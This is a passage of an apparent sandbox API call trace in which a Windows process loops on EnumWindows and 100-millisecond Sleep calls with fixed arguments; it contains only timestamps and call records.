[0245.114] Sleep (dwMilliseconds=0x64) [0245.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.190] Sleep (dwMilliseconds=0x64) [0245.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.276] Sleep (dwMilliseconds=0x64) [0245.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.350] Sleep (dwMilliseconds=0x64) [0245.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.422] Sleep (dwMilliseconds=0x64) [0245.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.464] Sleep (dwMilliseconds=0x64) [0245.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.536] Sleep (dwMilliseconds=0x64) [0245.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.609] Sleep (dwMilliseconds=0x64) [0245.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.662] Sleep (dwMilliseconds=0x64) [0245.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.723] Sleep (dwMilliseconds=0x64) [0245.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.795] Sleep (dwMilliseconds=0x64) [0245.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.865] Sleep (dwMilliseconds=0x64) [0245.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.923] Sleep (dwMilliseconds=0x64) [0246.003] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.004] Sleep (dwMilliseconds=0x64) [0246.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.079] Sleep (dwMilliseconds=0x64) [0246.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.132] Sleep (dwMilliseconds=0x64) [0246.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.248] Sleep (dwMilliseconds=0x64) [0246.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.394] Sleep (dwMilliseconds=0x64) [0246.431] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.432] Sleep (dwMilliseconds=0x64) [0246.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.504] Sleep (dwMilliseconds=0x64) [0246.685] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.686] Sleep (dwMilliseconds=0x64) [0246.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.737] Sleep (dwMilliseconds=0x64) [0246.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.795] Sleep (dwMilliseconds=0x64) [0246.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.883] Sleep (dwMilliseconds=0x64) [0246.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.943] Sleep (dwMilliseconds=0x64) [0246.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0246.998] Sleep (dwMilliseconds=0x64) [0247.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.071] Sleep (dwMilliseconds=0x64) [0247.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.139] Sleep (dwMilliseconds=0x64) [0247.184] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.184] Sleep (dwMilliseconds=0x64) [0247.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.284] Sleep (dwMilliseconds=0x64) [0247.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.357] Sleep (dwMilliseconds=0x64) [0247.404] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.404] Sleep (dwMilliseconds=0x64) [0247.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.466] Sleep (dwMilliseconds=0x64) [0247.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.536] Sleep (dwMilliseconds=0x64) [0247.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.595] Sleep (dwMilliseconds=0x64) [0247.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.644] Sleep (dwMilliseconds=0x64) [0247.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.718] Sleep (dwMilliseconds=0x64) [0247.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.826] Sleep (dwMilliseconds=0x64) [0247.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.896] Sleep (dwMilliseconds=0x64) [0247.956] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.957] Sleep (dwMilliseconds=0x64) [0247.972] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0247.972] Sleep (dwMilliseconds=0x64) [0248.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.013] Sleep (dwMilliseconds=0x64) [0248.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.084] Sleep (dwMilliseconds=0x64) [0248.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.161] Sleep (dwMilliseconds=0x64) [0248.228] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.229] Sleep (dwMilliseconds=0x64) [0248.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.308] Sleep (dwMilliseconds=0x64) [0248.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.415] Sleep (dwMilliseconds=0x64) [0248.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.477] Sleep (dwMilliseconds=0x64) [0248.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.546] Sleep (dwMilliseconds=0x64) [0248.618] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.618] Sleep (dwMilliseconds=0x64) [0248.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.680] Sleep (dwMilliseconds=0x64) [0248.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.736] Sleep (dwMilliseconds=0x64) [0248.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.811] Sleep (dwMilliseconds=0x64) [0248.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.883] Sleep (dwMilliseconds=0x64) [0248.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0248.929] Sleep (dwMilliseconds=0x64) [0249.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.048] Sleep (dwMilliseconds=0x64) [0249.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.120] Sleep (dwMilliseconds=0x64) [0249.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.160] Sleep (dwMilliseconds=0x64) [0249.270] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.350] Sleep (dwMilliseconds=0x64) [0249.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.403] Sleep (dwMilliseconds=0x64) [0249.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.462] Sleep (dwMilliseconds=0x64) [0249.539] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.539] Sleep (dwMilliseconds=0x64) [0249.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.612] Sleep (dwMilliseconds=0x64) [0249.653] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.654] Sleep (dwMilliseconds=0x64) [0249.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.727] Sleep (dwMilliseconds=0x64) [0249.805] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.805] Sleep (dwMilliseconds=0x64) [0249.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.858] Sleep (dwMilliseconds=0x64) [0249.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.927] Sleep (dwMilliseconds=0x64) [0249.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0249.998] Sleep (dwMilliseconds=0x64) [0250.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.066] Sleep (dwMilliseconds=0x64) [0250.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.118] Sleep (dwMilliseconds=0x64) [0250.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.252] Sleep (dwMilliseconds=0x64) [0250.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.325] Sleep (dwMilliseconds=0x64) [0250.371] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.372] Sleep (dwMilliseconds=0x64) [0250.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.445] Sleep (dwMilliseconds=0x64) [0250.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.519] Sleep (dwMilliseconds=0x64) [0250.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.567] Sleep (dwMilliseconds=0x64) [0250.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.628] Sleep (dwMilliseconds=0x64) [0250.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.700] Sleep (dwMilliseconds=0x64) [0250.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.765] Sleep (dwMilliseconds=0x64) [0250.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.825] Sleep (dwMilliseconds=0x64) [0250.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0250.932] Sleep (dwMilliseconds=0x64) [0251.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.016] Sleep (dwMilliseconds=0x64) [0251.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.060] Sleep (dwMilliseconds=0x64) [0251.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.133] Sleep (dwMilliseconds=0x64) [0251.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.226] Sleep (dwMilliseconds=0x64) [0251.274] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.275] Sleep (dwMilliseconds=0x64) [0251.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.411] Sleep (dwMilliseconds=0x64) [0251.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.498] Sleep (dwMilliseconds=0x64) [0251.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.561] Sleep (dwMilliseconds=0x64) [0251.613] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.614] Sleep (dwMilliseconds=0x64) [0251.685] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.686] Sleep (dwMilliseconds=0x64) [0251.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.761] Sleep (dwMilliseconds=0x64) [0251.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.799] Sleep (dwMilliseconds=0x64) [0251.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.878] Sleep (dwMilliseconds=0x64) [0251.964] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0251.965] Sleep (dwMilliseconds=0x64) [0252.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.104] Sleep (dwMilliseconds=0x64) [0252.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.187] Sleep (dwMilliseconds=0x64) [0252.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.293] Sleep (dwMilliseconds=0x64) [0252.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.346] Sleep (dwMilliseconds=0x64) [0252.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.427] Sleep (dwMilliseconds=0x64) [0252.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.554] Sleep (dwMilliseconds=0x64) [0252.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.622] Sleep (dwMilliseconds=0x64) [0252.687] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.688] Sleep (dwMilliseconds=0x64) [0252.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.761] Sleep (dwMilliseconds=0x64) [0252.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.832] Sleep (dwMilliseconds=0x64) [0252.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.878] Sleep (dwMilliseconds=0x64) [0252.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0252.950] Sleep (dwMilliseconds=0x64) [0253.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.023] Sleep (dwMilliseconds=0x64) [0253.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.067] Sleep (dwMilliseconds=0x64) [0253.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.139] Sleep (dwMilliseconds=0x64) [0253.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.233] Sleep (dwMilliseconds=0x64) [0253.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.289] Sleep (dwMilliseconds=0x64) [0253.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.349] Sleep (dwMilliseconds=0x64) [0253.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.425] Sleep (dwMilliseconds=0x64) [0253.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.498] Sleep (dwMilliseconds=0x64) [0253.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.536] Sleep (dwMilliseconds=0x64) [0253.618] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.618] Sleep (dwMilliseconds=0x64) [0253.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.727] Sleep (dwMilliseconds=0x64) [0253.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.799] Sleep (dwMilliseconds=0x64) [0253.837] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.838] Sleep (dwMilliseconds=0x64) [0253.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.876] Sleep (dwMilliseconds=0x64) [0253.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.919] Sleep (dwMilliseconds=0x64) [0253.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.923] Sleep (dwMilliseconds=0x64) [0253.961] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.962] Sleep (dwMilliseconds=0x64) [0253.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0253.998] Sleep (dwMilliseconds=0x64) [0254.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.018] Sleep (dwMilliseconds=0x64) [0254.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.046] Sleep (dwMilliseconds=0x64) [0254.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.083] Sleep (dwMilliseconds=0x64) [0254.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.112] Sleep (dwMilliseconds=0x64) [0254.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.167] Sleep (dwMilliseconds=0x64) [0254.260] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.261] Sleep (dwMilliseconds=0x64) [0254.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.330] Sleep (dwMilliseconds=0x64) [0254.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.377] Sleep (dwMilliseconds=0x64) [0254.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.455] Sleep (dwMilliseconds=0x64) [0254.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.582] Sleep (dwMilliseconds=0x64) [0254.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.647] Sleep (dwMilliseconds=0x64) [0254.721] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.722] Sleep (dwMilliseconds=0x64) [0254.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.786] Sleep (dwMilliseconds=0x64) [0254.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.844] Sleep (dwMilliseconds=0x64) [0254.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.919] Sleep (dwMilliseconds=0x64) [0254.961] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0254.962] Sleep (dwMilliseconds=0x64) [0255.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.017] Sleep (dwMilliseconds=0x64) [0255.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.091] Sleep (dwMilliseconds=0x64) [0255.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.165] Sleep (dwMilliseconds=0x64) [0255.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.240] Sleep (dwMilliseconds=0x64) [0255.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.305] Sleep (dwMilliseconds=0x64) [0255.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.378] Sleep (dwMilliseconds=0x64) [0255.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.441] Sleep (dwMilliseconds=0x64) [0255.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.489] Sleep (dwMilliseconds=0x64) [0255.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.560] Sleep (dwMilliseconds=0x64) [0255.634] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.635] Sleep (dwMilliseconds=0x64) [0255.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.676] Sleep (dwMilliseconds=0x64) [0255.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.745] Sleep (dwMilliseconds=0x64) [0255.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.841] Sleep (dwMilliseconds=0x64) [0255.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.915] Sleep (dwMilliseconds=0x64) [0255.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0255.954] Sleep (dwMilliseconds=0x64) [0256.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.031] Sleep (dwMilliseconds=0x64) [0256.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.147] Sleep (dwMilliseconds=0x64) [0256.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.277] Sleep (dwMilliseconds=0x64) [0256.374] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.375] Sleep (dwMilliseconds=0x64) [0256.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.454] Sleep (dwMilliseconds=0x64) [0256.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.528] Sleep (dwMilliseconds=0x64) [0256.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.579] Sleep (dwMilliseconds=0x64) [0256.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.651] Sleep (dwMilliseconds=0x64) [0256.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.730] Sleep (dwMilliseconds=0x64) [0256.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.842] Sleep (dwMilliseconds=0x64) [0256.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.924] Sleep (dwMilliseconds=0x64) [0256.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0256.995] Sleep (dwMilliseconds=0x64) [0257.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.104] Sleep (dwMilliseconds=0x64) [0257.180] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.181] Sleep (dwMilliseconds=0x64) [0257.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.371] Sleep (dwMilliseconds=0x64) [0257.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.440] Sleep (dwMilliseconds=0x64) [0257.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.524] Sleep (dwMilliseconds=0x64) [0257.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.599] Sleep (dwMilliseconds=0x64) [0257.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.670] Sleep (dwMilliseconds=0x64) [0257.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.711] Sleep (dwMilliseconds=0x64) [0257.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.784] Sleep (dwMilliseconds=0x64) [0257.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.868] Sleep (dwMilliseconds=0x64) [0257.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0257.951] Sleep (dwMilliseconds=0x64) [0258.021] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.022] Sleep (dwMilliseconds=0x64) [0258.096] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.097] Sleep (dwMilliseconds=0x64) [0258.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.159] Sleep (dwMilliseconds=0x64) [0258.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.233] Sleep (dwMilliseconds=0x64) [0258.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.325] Sleep (dwMilliseconds=0x64) [0258.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.396] Sleep (dwMilliseconds=0x64) [0258.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.509] Sleep (dwMilliseconds=0x64) [0258.584] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.585] Sleep (dwMilliseconds=0x64) [0258.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.658] Sleep (dwMilliseconds=0x64) [0258.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.717] Sleep (dwMilliseconds=0x64) [0258.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.772] Sleep (dwMilliseconds=0x64) [0258.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.853] Sleep (dwMilliseconds=0x64) [0258.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0258.925] Sleep (dwMilliseconds=0x64) [0259.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.006] Sleep (dwMilliseconds=0x64) [0259.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.081] Sleep (dwMilliseconds=0x64) [0259.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.158] Sleep (dwMilliseconds=0x64) [0259.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.218] Sleep (dwMilliseconds=0x64) [0259.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.236] Sleep (dwMilliseconds=0x64) [0259.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.330] Sleep (dwMilliseconds=0x64) [0259.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.410] Sleep (dwMilliseconds=0x64) [0259.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.488] Sleep (dwMilliseconds=0x64) [0259.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.566] Sleep (dwMilliseconds=0x64) [0259.674] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.675] Sleep (dwMilliseconds=0x64) [0259.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.729] Sleep (dwMilliseconds=0x64) [0259.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.794] Sleep (dwMilliseconds=0x64) [0259.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.874] Sleep (dwMilliseconds=0x64) [0259.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0259.941] Sleep (dwMilliseconds=0x64) [0260.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.000] Sleep (dwMilliseconds=0x64) [0260.073] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.074] Sleep (dwMilliseconds=0x64) [0260.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.148] Sleep (dwMilliseconds=0x64) [0260.191] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.192] Sleep (dwMilliseconds=0x64) [0260.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.280] Sleep (dwMilliseconds=0x64) [0260.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.367] Sleep (dwMilliseconds=0x64) [0260.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.460] Sleep (dwMilliseconds=0x64) [0260.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.549] Sleep (dwMilliseconds=0x64) [0260.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.626] Sleep (dwMilliseconds=0x64) [0260.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.700] Sleep (dwMilliseconds=0x64) [0260.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.745] Sleep (dwMilliseconds=0x64) [0260.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.808] Sleep (dwMilliseconds=0x64) [0260.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0260.936] Sleep (dwMilliseconds=0x64) [0261.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.018] Sleep (dwMilliseconds=0x64) [0261.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.075] Sleep (dwMilliseconds=0x64) [0261.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.156] Sleep (dwMilliseconds=0x64) [0261.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.248] Sleep (dwMilliseconds=0x64) [0261.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.297] Sleep (dwMilliseconds=0x64) [0261.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.369] Sleep (dwMilliseconds=0x64) [0261.443] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.444] Sleep (dwMilliseconds=0x64) [0261.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.520] Sleep (dwMilliseconds=0x64) [0261.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.586] Sleep (dwMilliseconds=0x64) [0261.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.665] Sleep (dwMilliseconds=0x64) [0261.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.741] Sleep (dwMilliseconds=0x64) [0261.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.815] Sleep (dwMilliseconds=0x64) [0261.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.884] Sleep (dwMilliseconds=0x64) [0261.964] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0261.964] Sleep (dwMilliseconds=0x64) [0262.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.080] Sleep (dwMilliseconds=0x64) [0262.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.161] Sleep (dwMilliseconds=0x64) [0262.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.255] Sleep (dwMilliseconds=0x64) [0262.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.297] Sleep (dwMilliseconds=0x64) [0262.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 